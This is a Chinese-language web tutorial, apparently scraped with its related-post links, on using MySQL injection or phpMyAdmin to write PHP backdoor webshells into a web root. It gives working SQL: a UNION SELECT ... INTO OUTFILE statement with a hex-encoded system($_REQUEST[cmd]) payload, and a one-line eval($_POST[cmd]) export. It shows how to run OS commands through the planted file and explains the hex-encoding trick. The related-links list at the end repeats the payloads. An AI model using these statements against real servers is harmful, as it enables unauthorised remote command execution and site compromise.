mysql定时木马_Mysql的语句生成后门木马的方法
咳咳,大家看看就好了,本人不负责所产生的后果
复制代码 代码如下:
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:2 3 <?php system($_REQUEST[cmd]);?>
再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统DOS命令!
哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?
就是<?php system($_REQUEST[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的, 哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!
浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。
文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):
Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表
Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)
这几句SQL很简单,我做了简单的注释。
不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句:
/**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*
然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。
如果我们把上面这句改成/**/UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。
也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。
既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢。
有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:
Select ' php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';
这样做不但简单明了,而且避免了误删别人的数据。以上所述就是本文的全部内容了,希望大家能够喜欢。
本文标题: Mysql的语句生成后门木马的方法
本文地址: http://www.cppcns.com/shujuku/mysql/123487.html
mysql定时木马_Mysql的语句生成后门木马的方法相关推荐
- 利用mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...
- mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...
- mysql 木马_用Mysql语句来生成后门木马方案
下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案. ...
- mysql后门_运用Mysql语句生成后门具体办法
软件安装:装机软件必备包 随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题.特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁. 通过M ...
- oracle 生成 sql语句,Oracle使用SQL语句生成日历的实现方法
Oracle使用SQL语句可以实现日历的功能,下面就为您详细介绍Oracle使用SQL语句生成日历的实现方法,希望对您能有所帮助. 1 要构造某年某月的日历,必须先知道这个月的开始时间,结束时间及天数 ...
- oracle+生成+sql语句,Oracle使用SQL语句生成日历的实现方法
Oracle使用SQL语句可以实现日历的功能,下面就为您详细介绍Oracle使用SQL语句生成日历的实现方法,希望对您能有所帮助. 1 要构造某年某月的日历,必须先知道这个月的开始时间,结束时间及天数 ...
- mysql 生成日历视图_mysql sql语句生成日历表
mysql sql语句生成日历表 (主要用于按月,按天group by分组统计时,有些日期没有记录,需要补0) 从自定义的开始时间,生成1万条记录 CREATE TABLE if not exist ...
- 利用msfvenom生成后门木马
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...
- 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...
最新文章
- 干货丨大牛带你走向机器学习“正道”:小朋友才迷信算法,大人们更重视工程实践
- css选择器顺序的小技巧
- 算法学习(五)---队列
- Python-可视化Evoked数据
- java include 传递对象_变量的值传递,地址引用(和对象成员变量、局部变量创建和初始化的内存机制)...
- GIVE_A_TRY.exe 逆向(NCK逆向初级第9,10,11课作业)
- 关于C++中vector初始化问题
- 如何转obj_Java 开发中如何正确的踩坑,看完这个你可以避免50%的错误
- 直播软件自动化测试,基于SRS-Bench工具的直播平台性能测试
- CentOS 7.2 终端安装字体
- 【光学】基于matlab夫琅禾费圆孔衍射【含Matlab源码 062期】
- Java容器类研究8:HashMap
- mysql数据库多表查询实例
- 《运筹学》CSU作业答案
- 【转】密码破解全能工具:Hashcat密码破解攻略
- JS实现俄罗斯方块小游戏
- LaTex图表中英文标题,中英文图表目录
- 得意狗寄给我特快专递
- 嵌入式系统与普适计算
- 最简单的Go Dockerfile编写姿势
热门文章
- Extjs 入门(03) 折叠||收锉
- Connected to an idle instance问题的小小仇恨
- 【干货】Html与CSS入门学习笔记12-14【完】
- 全面预测我国量子通信市场规模及发展趋势
- NYOJ10: skiing(DFS + DP)
- 基于Ameoba实现mysql读写分离
- initialization of 'XXX' is skipped by 'case' label
- 0 RabbitMQ概念
- [转载]高质量c/c++编程指南读书笔记
- CI框架源码阅读笔记7 配置管理组件 Config.php